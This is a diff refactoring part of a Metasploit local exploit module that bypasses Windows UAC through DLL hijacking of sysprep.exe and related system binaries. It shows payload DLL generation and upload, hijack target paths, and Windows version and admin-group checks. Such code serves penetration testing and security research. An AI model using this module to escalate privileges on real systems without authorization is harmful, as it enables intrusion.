@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Local
     run_injection(pid, dll_path, file_paths)
 
     # Windows 7 this is cleared up by DLL but on Windows
-    # 8.1 it fails to delete the the file.
+    # 8.1 it fails to delete the file.
     register_file_for_cleanup(file_paths[:szElevDllFull])
   end
 
@@ -114,10 +114,8 @@ class MetasploitModule < Msf::Exploit::Local
       unless (target_arch.first =~ /64/i) && (payload_instance.arch.first =~ /64/i)
         fail_with(Failure::BadConfig, 'x86 Target Selected for x64 System')
       end
-    else
-      if (target_arch.first =~ /64/i) || (payload_instance.arch.first =~ /64/i)
-        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
-      end
+    elsif (target_arch.first =~ /64/i) || (payload_instance.arch.first =~ /64/i)
+      fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
     end
 
     ::File.join(path, "bypassuac-#{sysarch}.dll")
@@ -131,12 +129,10 @@ class MetasploitModule < Msf::Exploit::Local
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
@@ -185,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def upload_payload_dll(payload_filepath)
-    payload = generate_payload_dll({ :dll_exitprocess => true })
+    payload = generate_payload_dll({ dll_exitprocess: true })
     print_status('Uploading the Payload DLL to the filesystem...')
     begin
       vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
@@ -199,13 +195,12 @@ class MetasploitModule < Msf::Exploit::Local
   def validate_environment!
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
-    winver = sysinfo['OS']
-
-    case winver
-    when /Windows (7|8|2008|2012|10)/
-      print_good("#{winver} may be vulnerable.")
+    version_info = get_version_info
+    # According to https://raw.githubusercontent.com/hfiref0x/UACME/c998cb1f1bafd36f566f17208b915dc48dda5edf/README.md
+    if version_info.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win8)
+      print_good("#{version_info.product_name} may be vulnerable.")
     else
-      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+      fail_with(Failure::NotVulnerable, "#{version_info.product_name} is not vulnerable.")
     end
 
     if is_uac_enabled?
@@ -220,13 +215,13 @@ class MetasploitModule < Msf::Exploit::Local
   def get_file_paths(win_path, payload_filepath)
     paths = {}
 
-    case sysinfo['OS']
-    when /Windows (7|2008)/
+    version_info = get_version_info
+    if version_info.win7_or_2008r2?
       paths[:szElevDll] = 'CRYPTBASE.dll'
       paths[:szElevDir] = "#{win_path}\\System32\\sysprep"
       paths[:szElevDirSysWow64] = "#{win_path}\\sysnative\\sysprep"
       paths[:szElevExeFull] = "#{paths[:szElevDir]}\\sysprep.exe"
-    when /Windows (8|2012|10)/
+    else
       paths[:szElevDll] = 'NTWDBLIB.dll'
       paths[:szElevDir] = "#{win_path}\\System32"
       # This should be fine to be left blank
